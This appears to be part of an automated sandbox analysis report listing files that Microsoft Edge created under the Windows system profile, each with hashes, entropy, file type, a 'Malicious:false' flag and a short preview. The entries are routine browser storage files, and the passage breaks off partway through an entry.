                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.629307656487099E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsFl0l0os+ll:LsFK0x+/
                                                                                                                                                                  MD5:13184192AC64AF03DAFA2B6DF4F3985F
                                                                                                                                                                  SHA1:DCFE65392341AC4D4762AB759D2EFE9B242E8683
                                                                                                                                                                  SHA-256:3652622B359CA4A104396719A23C6B5E4B28193F56201D83FA03CFFCEC39AF30
                                                                                                                                                                  SHA-512:59B01FF504B5D2FB1ABD347839C03078E02868926371DA9760EE65CC0320D26CECEF9D7E53F9582AD463ABDBC8EC05BF782245B6E971BFD1C54FC94C3794BE13
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.........................................1:.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):443
                                                                                                                                                                  Entropy (8bit):5.187619288190012
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7nKdIPhYebvqBvFLrPIvsPhYebvqBQFUv:7nquhYebv8LrP6ihYebvZ2
                                                                                                                                                                  MD5:8E8F15429463B4EE1018ABAA1D478C82
                                                                                                                                                                  SHA1:4BC7B2A1FC660B0D637ED316C8AD127E8FA95A18
                                                                                                                                                                  SHA-256:2853B55E74AF3A8D962F4C2ABC2F7C196A7232DBF10A6761F1C6BE813EC57ED0
                                                                                                                                                                  SHA-512:B95DEC369ABC0D0B2265CE70019302730B5C0CB9132F1943635D65481517CD1682BBDA8A96ADE5F0ED5264B12F3DD544301C52A42D278C51987EAF3F9B6D64F4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:27.900 1e80 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb since it was missing..2025/01/11-01:54:28.201 1e80 Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                  Entropy (8bit):3.7273991737283296
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                                  MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                                  SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                                  SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                                  SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f...............

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):431
                                                                                                                                                                  Entropy (8bit):5.171179577750267
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOnkoBJYDhP5c23oH+TcwtzjqEKj0QM72KLl1kEIq2TYDhP5c23oH+TcwtzjqEK6:7nkoIPhYebvqB6LrkTvsPhYebvqBZFUv
                                                                                                                                                                  MD5:C33D0F66F33DFBD190E19BBC60A762CC
                                                                                                                                                                  SHA1:F52BE5177A39B23B257B934002553B6293D63FED
                                                                                                                                                                  SHA-256:5B956BD6E20A9337D01E286BDE70F4C7128EB7584971C1E9AC192A247E2A84EE
                                                                                                                                                                  SHA-512:E12F7F593B2628D9692E458F496016AE6DC37F520B644D3E124673D4841FBDB11D95F088210500FF1BE51D3EE4B1EBF0C40D3FEE695AD075AA5FA2AFAD0530C0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:44.137 1e80 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage since it was missing..2025/01/11-01:54:44.214 1e80 Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                  Entropy (8bit):4.019797536844534
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                                                                                  MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                                                                                  SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                                                                                  SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                                                                                  SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...n'................_mts_schema_descriptor...

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):337
                                                                                                                                                                  Entropy (8bit):5.1820209802232995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOnXJYDhP5c23oH+TcwtBx2KLl1NM+q2TYDhP5c23oH+TcwtpIFUv:7niPhYebBVLre+vsPhYebmFUv
                                                                                                                                                                  MD5:F92D9C03431245DC08531F48A982C9D7
                                                                                                                                                                  SHA1:D384D75EE515B3FB624860790AE466B6F11BEF43
                                                                                                                                                                  SHA-256:DA00A6D575C60EA3FE40B939E9883A4608DC3921E95E5FDB4A50D6C5609CCD0C
                                                                                                                                                                  SHA-512:00DE1C84041C3EDE262DBB724FDDA8E696CB75D7450F90D53632A632CEDDAA1F48288BD9818D24AC9A8B779A8C4D0734BC77D2CE8982CDFF4917314DDDDB3D70
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:26.175 1a1c Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB since it was missing..2025/01/11-01:54:26.282 1a1c Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.35825715040616096
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLiNUyq1YA5yEHFxOUwa5qguyZ75fOSme2d:TLiuym8I6Uwcc25fBlC
                                                                                                                                                                  MD5:C46D4F7E6D7914D5FE3E867B0FC00A9F
                                                                                                                                                                  SHA1:8D7C399B0E4E3A76BC442C6D08C4F97C289B261B
                                                                                                                                                                  SHA-256:71C6980F5120E57C4E0AA0CC50B19D1F64C3837B5B174C504CB424BFF63AA7F3
                                                                                                                                                                  SHA-512:12133A44B66510634853E80C8B9AC8703642B2E95610CAFE8FFEC4358E0F648EE20742961E183230AB4E41AD5D0DEB2D47D2451A4D432FE6CD05B96D017DE16F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`.........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                  Entropy (8bit):0.002110589502647469
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ImtVnv9l:IiVv9l
                                                                                                                                                                  MD5:8D771947170D30DAB3A52CEC2BB9AFE4
                                                                                                                                                                  SHA1:92DA9DD9D9CF25E82F56D46F0ABA8653547E2777
                                                                                                                                                                  SHA-256:664A517037B90B58ACE668CC65F5C7992F10A75A9EE66E1937CD0FCC10D988DB
                                                                                                                                                                  SHA-512:834A13564C8B744E47F15C0BE5ABB8B7A90CEE5704E8A3A22060B2F79AEC43A859ABC6F838865862DC2BDE171757BE4E5D0066216A839913626DC1CE91C14136
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:VLnk.....?.......GgZ.y-................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 58, cookie 0x25, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):118784
                                                                                                                                                                  Entropy (8bit):1.147796728702347
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:mPoZY9zIH9xhoOnGCTjHbRjyeoqtzK1eaW29E6Vumy6W:mPh9za9xxnseoqtzK1en2/Vumyn
                                                                                                                                                                  MD5:B404F5155133E179BF8A1A19F02B4048
                                                                                                                                                                  SHA1:14403560C11C2D36D0C06341464D9A2DFB7C074D
                                                                                                                                                                  SHA-256:E1963A90ACD3D0F4DBB2748B8C43BDD1E013D3D188499B8165DB87B6679DA038
                                                                                                                                                                  SHA-512:3D5D2FE53ADE8EEAE1249B004052DB07E16A2F0149590FAE0EC0DF11854064291B150ECED8B1AA87F73872AFE78CAF91D178773C902EECABC6AD61F73576CAA4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......:...........%......................................................S`...........2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                  Entropy (8bit):0.6861432096545633
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:LBtiNQNr6XpAwqAYqAdjAX9lFyDcAAcAopAOFw6zhKPf0ehdkAX9g/u+:LLi+NWXp22iSBscGiOxhK3thdkSKm+
                                                                                                                                                                  MD5:CD94C4D2E58565DFA7894D1D9A7FDF95
                                                                                                                                                                  SHA1:1041FA15171CCEC920D2D62BEF6824F67FA56901
                                                                                                                                                                  SHA-256:AAFAE4BA38E8CD120EC8881D6DFA7AE18E1EB17763345EB3D2476075B40658DE
                                                                                                                                                                  SHA-512:F0F43F25A473851DF8C2B8C38367435F39D9E25EDC65E124C6CE938210735A193A23E69280B8503D52A8C0BE25D62FA8051A5CB85A2208A52B47E6328D3BB2F2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`...............^....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\a14c0f62-50b6-4212-af3b-5b2b74bab812.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4991
                                                                                                                                                                  Entropy (8bit):4.853684242513618
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:nonz1XFZ1aPjS+wwiIMti+NmdeHP7kGVWQyV+VDCAimF:no1EO+YI3+vIG6U
                                                                                                                                                                  MD5:C2D04B7B8C77CC6ECD856490ED9F930E
                                                                                                                                                                  SHA1:D4FD6DD0AA760951D1C7CE382ADAE20B5BC02596
                                                                                                                                                                  SHA-256:AC8F1F61A3AD0382DE68EE520B70064B30232E152DBDD8A479C2F8C90649C625
                                                                                                                                                                  SHA-512:B9D1536A46E2B10569B535A3B6D2E77A837049488D6B23B0A1AF71413DA01A4DEDB1F713A54233A9F854B3DC8FB29124989DFFB62AA37B1D2C0058A1A7204BA6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13381052067045495","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"window_placement":{"bottom":758,"left":10,"maximized":true,"right":1014,"top":10,"work_area_bottom":768,"work_area_left":0,"work_area_right":1024,"work_area_top":0}},"browser_content_container_height":665,"browser_content_container_width":1024,"browser_content_container_x":0,"browser_content_container_y":103,"countryid_at_install":21843,"custom_links":{"list":[]},"data_reduction":{"this_week_number":2871},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13381052067045053"},"download":{"default_directory":""},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_sitelist_location":"","consumer_sitelist_version":"","shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_e

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\b04a53e9-e829-40a2-bd2d-80571496c6a2.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\b851f156-c129-4d54-982c-e18bbd14889f.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):23937
                                                                                                                                                                  Entropy (8bit):5.5906478455741215
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:naSfCtvFLKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OV9LlG9yCBrUFgpFIOIjug:na4W9L8F1+UoAYDCx9Tuqh0VfUC9xboP
                                                                                                                                                                  MD5:291B941D0A5E8FC0A83EFA4D877B061C
                                                                                                                                                                  SHA1:0B6F7F88B1D192040A44F71F02610A9516C62CD3
                                                                                                                                                                  SHA-256:5EF5555E5373FB1F367E3BE29DD12342BA0EAA8E45585FAC2C4A36ED156B2A62
                                                                                                                                                                  SHA-512:7FC0ABD03ACBAA5BFC847C1DF8149B34A2B36D53B14C09E7296135E853DFF3BF2A0040A2F8FB809C365E26122B3E336DB96ADEDD33865D72FC45820E1701A53F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"extensions":{"settings":{"ampmimodbocknpfehkbdjolnnbongejb":{"state":1},"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13381052066563424","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.us/*","https://*powerpoint.gov.online.office365.us/*","https://*word-edit.gov.online.office365.us/*","https://*excel.dod.onli

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000002.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Xv:1qIF/
